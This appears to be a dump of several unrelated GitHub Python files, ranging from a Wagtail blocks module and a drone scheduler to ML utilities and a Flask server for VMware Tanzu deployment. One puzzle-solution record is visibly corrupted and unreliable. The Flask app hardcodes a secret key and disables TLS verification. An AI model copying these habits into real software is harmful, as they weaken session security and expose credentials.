EmbedBlock(_EmbedBlock):\n class Meta:\n template = 'blocks/embed_block.html'\n\n\nclass TextAlignmentChoiceBlock(ChoiceBlock):\n choices = [\n ('start', 'Left'), \n ('center', 'Centre'), \n ('end', 'Right'),\n ('justify', 'Justified'), \n ]\n\n\nclass ImageAlignmentChoiceBlock(ChoiceBlock):\n choices = [\n ('start', 'Left'), \n ('center', 'Centre'), \n ('end', 'Right'),\n ]\n\n\nclass RichTextBlock(StructBlock):\n alignment = TextAlignmentChoiceBlock(\n default = 'start',\n label = \"Text Alignment\"\n )\n text = _RichTextBlock()\n\n class Meta:\n template = 'blocks/richtext_block.html'\n label = \"Text\"\n icon = 'pilcrow'\n\n\nclass ColourThemeChoiceBlock(ChoiceBlock):\n choices = [\n ('primary', 'Primary'),\n ('secondary', 'Secondary'),\n ('success', 'Green'),\n ('danger', 'Red'),\n ('warning', 'Yellow'),\n ('info', 'Blue'),\n ('light', 'Light'),\n ('dark', 'Dark'),\n ]\n\n\nclass ImageChooserBlock(StructBlock):\n alignment = ImageAlignmentChoiceBlock(default='start')\n image = _ImageChooserBlock()\n\n class Meta:\n template = 'blocks/image_block.html'\n label = \"Image\"\n icon = 'image'\n\n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context)\n if value.get('alignment') == 'center':\n context.update({\n 'classes': 'img-fluid mx-auto d-block',\n })\n else:\n context.update({\n 'classes': 'img-fluid float-{}'.format(value),\n })\n return context\n\n\nclass SpacerBlock(StructBlock):\n space = ChoiceBlock(choices=[(0, '0'), (1, '16px'), (2, '32px'), (3, '48px'), (4, '64px')], default=1)\n space_mobile = ChoiceBlock(choices=[(0, '0'), (1, '16px'), (2, '32px'), (3, '48px'), (4, '64px')], default=0)\n\n class Meta:\n icon = \"fa-arrows-v\"\n template = \"blocks/spacer_block.html\"\n\n\nclass SimpleCard(StructBlock):\n background = ColourThemeChoiceBlock(\n default='bg-transparent',\n label=\"Card Background Colour\"\n ) \n text = RichTextBlock(\n label=\"Card Body Text\",\n help_text=\"Body text for this card.\",\n )\n\n class Meta:\n template = 'blocks/simple_card_block.html'\n label = \"Simple Card (Text Only)\"\n icon = 'form'\n\nclass LinkTargetBlock(StreamBlock):\n \"\"\"\n The target of a link, used by `LinkBlock`.\n \"\"\"\n\n page = PageChooserBlock(\n label=_(\"Page\"), icon='doc-empty-inverse'\n )\n document = DocumentChooserBlock(label=_(\"Document\"), icon='doc-full')\n image = ImageChooserBlock(label=_(\"Image\"))\n url = URLBlock(label=_(\"External link\"))\n anchor = CharBlock(\n label=_(\"Anchor link\"),\n help_text=mark_safe(\n _(\n \"An anchor in the current page, for example: \"\n \"#target-id.\"\n )\n ),\n )\n\n def set_name(self, name):\n # Do not generate a label from the name as Block.set_name does\n self.name = name\n\n class Meta:\n icon = 'link'\n max_num = 1\n form_classname = 'link-target-block'\n\n\nclass LinkValue(StructValue):\n def href(self):\n \"\"\"Return the URL of the chosen target or `None` if it is undefined.\"\"\"\n try:\n child_value = self['target'][0].value\n except (IndexError, KeyError):\n return None\n if hasattr(child_value, 'file') and hasattr(child_value.file, 'url'):\n href = child_value.file.url\n elif hasattr(child_value, 'url'):\n href = child_value.url\n else:\n href = child_value\n return href\n\n\nclass LinkBlock(StructBlock):\n \"\"\"\n A link with a target chosen from a range of types - i.e. a page, an URL.\n \"\"\"\n\n class Meta:\n icon = 'link'\n label = _(\"Link\")\n value_class = LinkValue\n form_classname = 'link-block'\n form_template = 'pages/block_forms/link_block.html'\n\n def __init__(self, *args, required=True, **kwargs):\n super().__init__(*args, required=required, **kwargs)\n\n target = LinkTargetBlock(required=required)\n target.set_name('target')\n\n self.child_blocks['target'] = target\n\n @property\n def required(self):\n return self.meta.required\n\n\nclass ButtonBlock(StructBlock):\n \"\"\"\n A button which acts like a link.\n \"\"\"\n\n text = CharBlock(label=_(\"Text\"))\n link = LinkBlock()\n\n class Meta:\n icon = 'link'\n label = _(\"Button\")\n template = 'blocks/button_block.html'\n\n\nclass HorizontalRuleBlock(StructBlock):\n class Meta:\n icon = 'horizontalrule'\n label = _(\"Horizontal Rule\")\n template = 'blocks/hr_block.html'\n\n\nclass CarouselItemBlock(StructBlock):\n image = _ImageChooserBlock()\n caption = _RichTextBlock()\n\n\nclass CarouselBlock(StructBlock):\n items = ListBlock(CarouselItemBlock())\n\n class Meta:\n icon = 'image'\n label = _('Image carousel')\n template = 'blocks/carousel_block.html'\n\n \n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context)\n context['uuid'] = uuid.uuid4()\n return context\n\n \n\n\n\n\nclass CommonBlocks(StreamBlock):\n # heading = HeadingBlock(group=\"Common\")\n text = RichTextBlock(group=\"Common\")\n # text_collapse = TextCollapse(group=\"Common\")\n image = ImageChooserBlock(group=\"Common\")\n button = ButtonBlock(group=\"Common\")\n # round_image = RoundImageChooserBlock(group=\"Common\")\n video = EmbedBlock(group=\"Common\")\n html = RawHTMLBlock(group=\"Common\")\n space = SpacerBlock(group=\"Common\")\n card = SimpleCard(group=\"Common\")\n hr = HorizontalRuleBlock(group=\"Common\")\n carousel = CarouselBlock(group=\"Common\")\n # accordion = AccordionBlock(child_block=AccordionElement(), group=\"Common\")\n # tile = TileBlock(group=\"Common\")\n\nclass BaseColumnTwo(StructBlock):\n left = CommonBlocks(required=False)\n right = CommonBlocks(required=False)\n\n class Meta:\n icon = \"table\"\n\n\nclass Column11(BaseColumnTwo):\n\n class Meta:\n template = 'blocks/column11_block.html'\n label = \"Column (1|1)\"\n\n\nclass Column21(BaseColumnTwo):\n\n class Meta:\n template = 'blocks/column21_block.html'\n label = \"Column (2|1)\"\n\n\nclass Column12(BaseColumnTwo):\n\n class Meta:\n template = 'blocks/column12_block.html'\n label = \"Column (1|2)\"\n\n\nclass Column111(StructBlock):\n left = CommonBlocks(required=False)\n middle = CommonBlocks(required=False)\n right = CommonBlocks(required=False)\n\n class Meta:\n template = 'blocks/column111_block.html'\n icon = \"table\"\n label = \"Column (1|1|1)\"\n\n\nclass ColumnBlocks(StreamBlock):\n column11 = Column11(group=\"Columns\")\n column111 = Column111(group=\"Columns\")\n column12 = Column12(group=\"Columns\")\n column21 = Column21(group=\"Columns\")\n\n\nclass ProductionDaysBlock(StructBlock):\n production_day_limit = IntegerBlock(default=4, required=False)\n\n class Meta:\n template = 'blocks/production_days_block.html'\n label = _('Production Days')\n icon = 'date'\n\n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context)\n if parent_context and 'request' in parent_context:\n production_days = ProductionDay.objects.published().upcoming().available_to_user(parent_context['request'].user)\n else:\n production_days = ProductionDay.objects.published().upcoming().available()\n if parent_context and 'production_day_next' in parent_context:\n production_days = production_days.exclude(id=parent_context['production_day_next'].pk)\n if value.get('production_day_limit'):\n production_days = production_days[:value.get('production_day_limit')]\n context['production_days'] = production_days\n return context\n \n\nclass ProductAssortmentBlock(StructBlock):\n only_planned_products = BooleanBlock(default=True, required=False)\n\n class Meta:\n template = 'blocks/product_assortment_block.html'\n label = _('Product Assortment')\n icon = 'list-ul'\n\n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context)\n products = Product.objects.filter(is_sellable=True)\n if value.get('only_planned_products'):\n today = datetime.now().date()\n products = products.filter(production_days__production_day__day_of_sale__gte=today)\n context['products'] = products.distinct().order_by('category')\n return context\n\n\nclass BakeupBlocks(StreamBlock):\n production_days = ProductionDaysBlock(group=\"Bakeup\")\n product_assortment = ProductAssortmentBlock(group=\"Bakeup\")\n\n\nclass ContentBlocks(CommonBlocks, ColumnBlocks):\n pass\n\nclass AllBlocks(BakeupBlocks, CommonBlocks, ColumnBlocks):\n pass","repo_name":"bruecksen/bakeup","sub_path":"bakeup/pages/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":9968,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"16966587799","text":"#!/Users/sandeepbalaji/anaconda3/bin/python\nimport re, math, sys, os\nfrom datetime import datetime, timedelta\n\ninput_file = sys.argv[1]\noutput_file = os.path.dirname(sys.argv[1])+\"/output.txt\"\nprint(output_file)\n\n#Calculate ratings for the hours\n# 1 -> promoters\n# 0 -> neutral\n# -1 -> detractors\ndef ratings(hours):\n if int(hours) <= 1:\n return 1\n elif int(hours) > 7:\n return -1\n else:\n return 0\n\n#read the input file and return them as list of tuples\ndef read_input(filename):\n data =[]\n file = open(filename, \"r\")\n for line in file:\n data.append(tuple(line.split()))\n file.close()\n return data\n\n#calculate the distance required for the order\ndef calc_distance(coordinate):\n x, y = re.split(r'\\D',coordinate)[1:]\n sum = math.sqrt(int(x)**2 + int(y)**2)\n return 2*sum\n\n#calculate the hours for the order\ndef calc_hours(start_time, order_time, distance):\n minutes = (start_time - order_time).seconds/60 + distance\n return minutes/60\n\n#calculate the nps score for all the scheduled orders\ndef calc_nps(out, inp):\n promoters = 0\n detractors = 0\n assert len(inp) == len(out)\n for i in range(len(inp)):\n distance = calc_distance(inp[i][1])\n order_time = datetime.strptime(inp[i][2], '%H:%M:%S')\n start_time = datetime.strptime(out[i][1], '%H:%M:%S')\n hours = calc_hours(start_time, order_time, distance)\n if ratings(hours) == 1:\n promoters += 1\n elif ratings(hours) == -1:\n detractors += 1\n return round((promoters-detractors)/len(inp)*100)\n\n#function for filtering orders which are less than the current time\ndef filter_data(data, current_time):\n list = []\n for i in range(len(data)):\n if datetime.strptime(data[i][2], '%H:%M:%S') < current_time:\n list.append(data[i])\n else:\n break\n return list\n\n#main function\nif __name__ == '__main__':\n out = []\n data = read_input(input_file)\n inp = data.copy()\n data_set = set(data)\n current_time = datetime.strptime('06:00:00', '%H:%M:%S') #start at 6am\n filtered = filter_data(data, current_time)\n fulfilled = set()\n output = open(output_file, \"wt\")\n date_check = datetime.strptime('22:00:00', '%H:%M:%S') #variable to check for 10pm\n while fulfilled.symmetric_difference(data_set) != set(): #loop until all the orders are scheduled\n best_hours = float('inf')\n ind = -1\n for i in range(len(filtered)):\n distance = calc_distance(filtered[i][1])\n hours = calc_hours(current_time, datetime.strptime(filtered[i][2], '%H:%M:%S'), distance/2)\n if best_hours > hours: #get the order with least cost(distance + time elapsed)\n best_hours = hours\n ind = i\n\n if current_time > date_check: #if time crosses 10pm, push to next day 6pm\n current_time = datetime.strptime('22:00:00', '%H:%M:%S')+timedelta(hours=8)\n date_check += timedelta(days=1)\n distance = calc_distance(filtered[ind][1])\n hours = calc_hours(current_time, datetime.strptime(filtered[ind][2], '%H:%M:%S'), distance/2)\n out.append(tuple([filtered[ind][0], current_time.time().strftime('%H:%M:%S')]))\n output.write(filtered[ind][0]+\" \" +current_time.time().strftime('%H:%M:%S') +\"\\n\")\n fulfilled.add(filtered[ind])\n data.remove(filtered[ind])\n current_time += timedelta(seconds=60*distance)\n filtered = filter_data(data, current_time)\n if filtered == [] and data != []:#pick the next least order, if no orders to schedule\n current_time = datetime.strptime(data[0][2], '%H:%M:%S')\n filtered = filter_data(data, current_time)\n\n nps = calc_nps(out, inp)\n output.write(\"NPS \"+str(nps))\n output.close()\n","repo_name":"cbsandeep10/drone-schedule-challenge","sub_path":"drone_schedule.py","file_name":"drone_schedule.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8070472748","text":"class Solution(object):\n def getAverages(self, nums, k):\n dictMap = {\n }\n if len(nums)=0 and next_pointer None:\n\n \"\"\"Calculate the frequency per cell for all gene types in the previously created masks.\"\"\"\n\n for col_name, new_col_name in zip(g_fct.df_col_names(c['all_tissue_mask_names_calc'], c['units'][0]),\n g_fct.df_col_names(c['all_tissue_mask_names_calc'], c['units'][1])):\n\n df_counts[new_col_name] = df_counts[col_name] / df_counts.loc['cells', col_name]\n\n#################################\n","repo_name":"spatialhisto/GTC","sub_path":"gtc/calc/gtc_calc__calc_counts_per_cell.py","file_name":"gtc_calc__calc_counts_per_cell.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7794637368","text":"from sentence_transformers.readers import InputExample\r\nimport csv\r\nimport gzip\r\nimport os\r\n\r\n\r\nclass LabelSentenceReader:\r\n \"\"\"Reads in a file that has at least two columns: a label and a sentence.\r\n This reader can for example be used with the BatchHardTripletLoss.\r\n Maps labels automatically to integers\"\"\"\r\n\r\n def __init__(self, folder, label_col_idx=0, sentence_col_idx=1, separator='\\t', aug_method='eda'):\r\n self.folder = folder\r\n self.label_map = {}\r\n self.label_col_idx = label_col_idx\r\n self.sentence_col_idx = sentence_col_idx\r\n self.separator = separator\r\n self.aug_method = aug_method\r\n\r\n def get_examples(self, filename, max_examples=0):\r\n examples = []\r\n labels = []\r\n id = 0\r\n for line in open(os.path.join(self.folder, filename), encoding=\"utf-8\"):\r\n splits = line.strip().split(self.separator)\r\n label = splits[self.label_col_idx]\r\n sentence = splits[self.sentence_col_idx]\r\n\r\n if self.aug_method in ['eda']:\r\n context_aug_sentence = splits[2]\r\n random_aug_sentence = splits[3]\r\n back_translation_aug = splits[4]\r\n texts = [sentence, context_aug_sentence, random_aug_sentence, back_translation_aug]\r\n elif self.aug_method in ['dropout']:\r\n texts = [sentence, sentence]\r\n elif self.aug_method in ['mix']:\r\n back_translation_aug = splits[4]\r\n texts = [sentence, sentence, back_translation_aug, back_translation_aug]\r\n elif self.aug_method in ['bt']:\r\n back_translation_aug = splits[4]\r\n texts = [sentence, back_translation_aug]\r\n elif self.aug_method in ['none']:\r\n texts = [sentence]\r\n else:\r\n texts = []\r\n\r\n if label not in self.label_map:\r\n self.label_map[label] = len(self.label_map)\r\n\r\n label_id = self.label_map[label]\r\n guid = \"%s-%d\" % (filename, id)\r\n id += 1\r\n examples.append(InputExample(guid=guid, texts=texts, label=label_id))\r\n\r\n if 0 < max_examples <= id:\r\n break\r\n\r\n labels.append(label_id)\r\n\r\n return examples, labels\r\n","repo_name":"bbsngg/STAM","sub_path":"src/utils/LabelSentenceReader.py","file_name":"LabelSentenceReader.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72728332714","text":"# -*-coding:utf-8 -*\n\n# Player data\nplayer_name = \"\"\nplayer_attempt = \"\"\nplayer_score = 0\n\n# Word data\nrandom_word = \"\"\nhidden_word = \"\"\nwords = []\n\n# File data\nscores = {}\nfilepath = {\n \"dictionary\": \"..\\media\\dictionary.txt\",\n \"scores\": \"scores\",\n}\n\n# Counter\nscore_counter = 8","repo_name":"dalyl-zero/Hangman","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9045562688","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 29 15:46:45 2022\n\n@author: rosskearney\n\"\"\"\n\nimport pandas as pd\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\nimport statsmodels.api as sm\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.linear_model import LogisticRegression\n\n# =============================================================================\n# IMPORT DATA\n# =============================================================================\n\ndf = pd.read_csv('/Users/rosskearney/Desktop/Machine Learning/GroupProject/European_bank_marketing.csv')\n\n# =============================================================================\n# CREATE DUMMY VARIABLES TO DEAL WITH CATAGORICAL VARIABLES\n# =============================================================================\n\ndummydf = pd.get_dummies(df)\n\n# =============================================================================\n# SET DEPENDANT VARIABLE 'term_deposit'\n# =============================================================================\n\ny = dummydf['term_deposit']\nx = dummydf.drop('term_deposit', axis=1)\nx = x.drop('duration', axis=1)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state = 0)\n\ncolumns = x_train.columns\n\n# =============================================================================\n# OVERFITTING\n# =============================================================================\n\nos = SMOTE(random_state=0)\n\n\nos_data_X,os_data_y=os.fit_resample(x_train, y_train)\nos_data_X = pd.DataFrame(data=os_data_X,columns=columns )\nos_data_y= pd.DataFrame(data=os_data_y,columns=['term_deposit'])\n\n# we can Check the numbers of our data\nprint(\"length of oversampled data is \",len(os_data_X))\nprint(\"Number of no subscription in oversampled data\",len(os_data_y[os_data_y['term_deposit']==0]))\nprint(\"Number of subscription\",len(os_data_y[os_data_y['term_deposit']==1]))\nprint(\"Proportion of no subscription data in oversampled data is \",len(os_data_y[os_data_y['term_deposit']==0])/len(os_data_X))\nprint(\"Proportion of subscription data in oversampled data is \",len(os_data_y[os_data_y['term_deposit']==1])/len(os_data_X))\n\n\n# =============================================================================\n# PRINT RESULTS\n# =============================================================================\n\nX=os_data_X\ny=os_data_y\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\nlogreg = LogisticRegression(max_iter=10000)\nlogreg.fit(X_train, y_train)\n\ny_pred = logreg.predict(X_test)\nprint('Accuracy of logistic regression classifier on test set: {:.3f}'.format(logreg.score(X_test, y_test)))\n\n\nconfusion_matrix = confusion_matrix(y_test, y_pred)\nprint(confusion_matrix)\n","repo_name":"Rosskearney/Machine-Learning","sub_path":"Q4b.py","file_name":"Q4b.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16465766379","text":"from collections import ChainMap\nimport builtins\nimport os, argparse\nprint('-' * 80)\na = {'Kotlin':90,'Python':86}\nb = {'Go':93,'Python':92}\nc = {'Swift':89,'Go':87}\ncm = ChainMap(a,b,c)\nprint('ChainMap : ', cm)\nprint('Python : ', cm['Python'])\nprint('Go : ', cm['Go'])\nprint('-' * 80)\nmy_name = 'Harry'\ndef test():\n my_name = 'Jack'\n pylookup = ChainMap(locals(), globals(), vars(builtins))\n print(pylookup['my_name'])\n print(pylookup['len'])\ntest() \nprint('-' * 80)\ndefaults = {'color':'Blue','user':'Harry'}\nparser = argparse.ArgumentParser()\nparser.add_argument('-u','--user')\nparser.add_argument('-c','--color')\nnamespace = parser.parse_args()\ncommand_line_args = {k:v for k,v in vars(namespace).items() if v}\ncombined = ChainMap(command_line_args, os.environ, defaults)\nprint(combined['color'])\nprint(combined['user'])\nprint('-' * 80)","repo_name":"ItManHarry/Python","sub_path":"PythonCSDN/code/book/chapter10/code-chainmap.py","file_name":"code-chainmap.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27390162944","text":"import datetime\nimport json\nimport logging\nimport os\nimport sys\nimport uuid\nfrom http import HTTPStatus\nfrom logging.config import fileConfig\nfrom logging.handlers import RotatingFileHandler\nfrom os.path import basename\nfrom pathlib import Path\nfrom zipfile import ZipFile\n\nimport jwt\nimport requests\nfrom flask import Flask, jsonify, send_file, session\nfrom flask_cors import CORS\nfrom flask_injector import FlaskInjector, inject, singleton\nfrom flask_restful import Api, request\nfrom flask_swagger_ui import get_swaggerui_blueprint\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\nfrom common.cleanup.cleanup import cleanup_env\nfrom common.deployApp.deployApp import deploy_app\nfrom common.harbor.push_tkg_image_to_harbor import harbor\nfrom common.login_auth.authentication import token_required\nfrom common.login_auth.users import Users, db\nfrom common.operation.constants import Paths, SivtStatus\nfrom common.operation.ShellHelper import runShellCommandAndReturnOutputAsList\nfrom common.prechecks.list_reources import vcenter_resources\nfrom common.prechecks.precheck import vcenter_precheck\nfrom common.session.session_acquire import session_acquire\nfrom common.tkg.extension.deploy_ext import tkg_extensions\nfrom common.util.common_utils import CommonUtils\nfrom common.util.deployment_status_util import deploy_status\nfrom common.util.log_streaming_util import log_stream\nfrom common.util.request_api_util import RequestApiUtil\nfrom common.util.tiny_db_util import TinyDbUtil\nfrom common.wcp_shutdown.wcp_shutdown import shutdown_env\nfrom vcd.vcd_prechecks.vcd_ui_utils import vcd_ui_util\nfrom vcd.vcd_prechecks.vcdPrechecks import vcd_precheck\nfrom vmc.aviConfig.avi_config import avi_config, configure_alb\nfrom vmc.managementConfig.management_config import configManagementCluster, management_config\nfrom vmc.sharedConfig.shared_config import configSharedCluster, shared_config\nfrom vmc.vmcConfig.vmc_config import config_vmc_env, vmc_config\nfrom vmc.workloadConfig.workload_config import workload_config, workloadConfig\nfrom vsphere.aviConfig.vsphere_avi_config import vcenter_avi_config\nfrom vsphere.managementConfig.vsphere_management_config import vsphere_management_config\nfrom vsphere.managementConfig.vsphere_tkgs_supervisor_config import vsphere_supervisor_cluster\nfrom vsphere.sharedConfig.vsphere_shared_config import vsphere_shared_config\nfrom vsphere.vcfConfig.vcf_config import vcf_config\nfrom vsphere.workloadConfig.vsphere_tkgs_workload import vsphere_tkgs_workload_cluster\nfrom vsphere.workloadConfig.vsphere_workload_config import vsphere_workload_config\n\nfileConfig(Path(\"logging.conf\"))\nlogger = logging.getLogger(__name__)\nlogging.config.fileConfig(\"logging.conf\")\n\nPath(\"/var/log/server/\").mkdir(parents=True, exist_ok=True)\n\nlogger.setLevel(logging.DEBUG)\nLOG_FILENAME = \"/var/log/server/arcas.log\"\nformatter = logging.Formatter(\"%(asctime)-16s %(levelname)-8s %(filename)-s:%(lineno)-3s %(message)s\")\n\nhandler = RotatingFileHandler(LOG_FILENAME, maxBytes=5242880, backupCount=10)\nhandler.setFormatter(formatter)\nhandler.setLevel(logging.DEBUG)\n\nstdout_handler = logging.StreamHandler(sys.stdout)\nstdout_handler.setFormatter(formatter)\nstdout_handler.setLevel(logging.INFO)\n\napp = Flask(__name__)\napi = Api(app)\nCORS(app, supports_credentials=True)\napp.config[\"SECRET_KEY\"] = \"004f2af45d3a4e161a7dd2d17fdae47f\"\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite://///opt/vmware/arcas/src/sivt.db\"\napp.config[\"PERMANENT_SESSION_LIFETIME\"] = datetime.timedelta(minutes=235)\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = True\ndb.init_app(app)\n\n\n@app.before_first_request\ndef create_tables():\n db.create_all()\n\n\n# swagger specific ###\nSWAGGER_URL = \"/swagger\"\nSWAGGER_BLUEPRINT = get_swaggerui_blueprint(\n SWAGGER_URL,\n api_url=None,\n config={\n \"app_name\": \"arcas\",\n \"layout\": \"StandaloneLayout\",\n \"plugins\": [\"TopBar\"],\n \"urls\": [\n {\"url\": \"/static/vsphere.json\", \"name\": \"vsphere\", \"primaryName\": \"vsphere\"},\n {\"url\": \"/static/vmc.json\", \"name\": \"vmc\", \"primaryName\": \"vmc\"},\n {\"url\": \"/static/vcf.json\", \"name\": \"vcf\", \"primaryName\": \"vcf\"},\n ],\n },\n blueprint_name=\"arcas\",\n)\n\napp.register_blueprint(SWAGGER_BLUEPRINT, url_prefix=SWAGGER_URL)\n# end swagger specific ###\n\napp.logger.addHandler(handler)\napp.logger.addHandler(stdout_handler)\napp.register_blueprint(shared_config, url_prefix=\"\")\napp.register_blueprint(vmc_config, url_prefix=\"\")\napp.register_blueprint(vcf_config, url_prefix=\"\")\napp.register_blueprint(avi_config, url_prefix=\"\")\napp.register_blueprint(workload_config, url_prefix=\"\")\napp.register_blueprint(deploy_app, url_prefix=\"\")\napp.register_blueprint(management_config, url_prefix=\"\")\napp.register_blueprint(session_acquire, url_prefix=\"\")\napp.register_blueprint(vcenter_avi_config, url_prefix=\"\")\n\napp.register_blueprint(vsphere_management_config, url_prefix=\"\")\napp.register_blueprint(vsphere_shared_config, url_prefix=\"\")\napp.register_blueprint(vsphere_workload_config, url_prefix=\"\")\napp.register_blueprint(vcenter_precheck, url_prefix=\"\")\napp.register_blueprint(vcenter_resources, url_prefix=\"\")\napp.register_blueprint(tkg_extensions, url_prefix=\"\")\napp.register_blueprint(cleanup_env, url_prefix=\"\")\napp.register_blueprint(harbor, url_prefix=\"\")\napp.register_blueprint(shutdown_env, url_prefix=\"\")\napp.register_blueprint(vcd_precheck, url_prefix=\"\")\napp.register_blueprint(vcd_ui_util, url_prefix=\"\")\napp.register_blueprint(vsphere_tkgs_workload_cluster, url_prefix=\"\")\napp.register_blueprint(vsphere_supervisor_cluster, url_prefix=\"\")\napp.register_blueprint(deploy_status, url_prefix=\"\")\napp.register_blueprint(log_stream, url_prefix=\"\")\n\n\ndef configure(binder):\n # incase of server restart all the in-progress(halted) jobs needs to be error.\n db_file = Paths.SIVT_DB_FILE\n db_object = TinyDbUtil(Paths.SIVT_DB_FILE)\n if CommonUtils.is_file_exist(db_file):\n db_object.update_in_progress_to_error()\n binder.bind(TinyDbUtil, to=db_object, scope=singleton)\n\n\n@app.before_request\n@inject\ndef before_request_func(tiny_db_util: TinyDbUtil):\n env = request.headers.get(\"Env\")\n json_data = \"\"\n # fetch json data from endpoint body\n if len(request.data) > 0:\n json_data = request.get_json(force=True)\n # update db, in case new request and db json not exist\n tiny_db_util.check_db_file(env=env, json_file=json_data)\n # update db with in-progress status\n endpoint_path = request.path\n component = CommonUtils.match_endpoint(endpoint_path)\n if component:\n tiny_db_util.update_db_file(SivtStatus.IN_PROGRESS, component)\n\n\n@app.after_request\n@inject\ndef after_request_func(response, tiny_db_util: TinyDbUtil):\n # update db with deployment job status\n endpoint_path = request.path\n component = CommonUtils.match_endpoint(endpoint_path)\n if component:\n if response.status_code == HTTPStatus.OK:\n tiny_db_util.update_db_file(SivtStatus.SUCCESS, component)\n else:\n tiny_db_util.update_db_file(SivtStatus.FAILED, component)\n return response\n\n\n@app.route(\"/api/tanzu/vmc/tkgm\", methods=[\"POST\"])\n@token_required\ndef configTkgm(current_user):\n vmc = config_vmc_env()\n if vmc[1] != 200:\n app.logger.error(vmc[0].json[\"msg\"])\n d = {\"responseType\": \"ERROR\", \"msg\": vmc[0].json[\"msg\"], \"STATUS_CODE\": 500}\n return jsonify(d), 500\n avi = configure_alb()\n if vmc[1] != 200:\n app.logger.error(str(avi[0].json[\"msg\"]))\n d = {\"responseType\": \"ERROR\", \"msg\": str(avi[0].json[\"msg\"]), \"STATUS_CODE\": 500}\n return jsonify(d), 500\n mgmt = configManagementCluster()\n if mgmt[1] != 200:\n app.logger.error(str(mgmt[0].json[\"msg\"]))\n d = {\"responseType\": \"ERROR\", \"msg\": str(mgmt[0].json[\"msg\"]), \"STATUS_CODE\": 500}\n return jsonify(d), 500\n shared = configSharedCluster()\n if shared[1] != 200:\n app.logger.error(str(shared[0].json[\"msg\"]))\n d = {\"responseType\": \"ERROR\", \"msg\": str(shared[0].json[\"msg\"]), \"STATUS_CODE\": 500}\n return jsonify(d), 500\n workLoad = workloadConfig()\n if workLoad[1] != 200:\n app.logger.error(str(workLoad[0].json[\"msg\"]))\n d = {\"responseType\": \"ERROR\", \"msg\": str(workLoad[0].json[\"msg\"]), \"STATUS_CODE\": 500}\n return jsonify(d), 500\n d = {\"responseType\": \"SUCCESS\", \"msg\": \"Tkgm configured Successfully \", \"STATUS_CODE\": 200}\n app.logger.info(\"Tkgm configured Successfully \")\n return jsonify(d), 200\n\n\n@app.route(\"/api/tanzu/login\", methods=[\"POST\"])\ndef login_user():\n auth = request.authorization\n try:\n server = request.headers[\"Server\"]\n except Exception:\n app.logger.error(\"vCenter Server is not passed as header\")\n response = RequestApiUtil.create_json_object(\n \"vCenter Server is not passed as header\", response_type=\"ERROR\", status_code=HTTPStatus.UNAUTHORIZED\n )\n return response, HTTPStatus.UNAUTHORIZED\n\n if not auth or not auth.username or not auth.password:\n app.logger.error(\"Username and Password not passed.\")\n response = RequestApiUtil.create_json_object(\n \"Username and Password not passed\", response_type=\"ERROR\", status_code=HTTPStatus.UNAUTHORIZED\n )\n return response\n sess = requests.post(\n \"https://\" + str(server) + \"/rest/com/vmware/cis/session\", auth=(auth.username, auth.password), verify=False\n )\n if sess.status_code != 200:\n app.logger.error(\"Connection to vCenter failed, incorrect user name or password\")\n response = RequestApiUtil.create_json_object(\n \"Connection to vCenter failed, incorrect user name or password\",\n response_type=\"ERROR\",\n status_code=HTTPStatus.UNAUTHORIZED,\n )\n return response, HTTPStatus.UNAUTHORIZED\n execute = False\n try:\n user = Users.query.filter_by(name=auth.username).first()\n if user is None:\n execute = True\n except Exception:\n execute = True\n if execute:\n hashed_password = generate_password_hash(auth.password, method=\"sha256\")\n new_user = Users(public_id=str(uuid.uuid4()), name=auth.username, password=hashed_password, admin=False)\n db.session.add(new_user)\n db.session.commit()\n user = Users.query.filter_by(name=auth.username).first()\n if check_password_hash(user.password, auth.password):\n app.logger.info(\"Generated token successfully\")\n token = jwt.encode(\n {\"public_id\": user.public_id, \"exp\": datetime.datetime.utcnow() + datetime.timedelta(minutes=240)},\n app.config[\"SECRET_KEY\"],\n \"HS256\",\n )\n session[\"username\"] = auth.username\n app.logger.info(\"Login successful\")\n response = RequestApiUtil.create_json_object(\n \"Successfully fetched session token\",\n response_type=\"SUCCESS\",\n status_code=HTTPStatus.UNAUTHORIZED,\n add_data={\"token\": token},\n )\n return response, HTTPStatus.OK\n\n app.logger.error(\"Could not verify, login required\")\n response = RequestApiUtil.create_json_object(\n \"Could not verify, login required\", response_type=\"ERROR\", status_code=HTTPStatus.UNAUTHORIZED\n )\n return response, HTTPStatus.UNAUTHORIZED\n\n\n@app.route(\"/api/tanzu/active_session\", methods=[\"GET\"])\ndef check_active_session():\n user = session.get(\"username\")\n if user is None:\n is_active = False\n else:\n is_active = True\n app.logger.info(\"******\")\n app.logger.info(user)\n if is_active:\n app.logger.info(\"You are already logged in as: \" + user)\n response = RequestApiUtil.create_json_object(\n \"You are already logged in as: \" + user,\n status_code=HTTPStatus.OK,\n add_data={\"SESSION\": \"ACTIVE\", \"USER\": user},\n )\n return response, HTTPStatus.OK\n else:\n 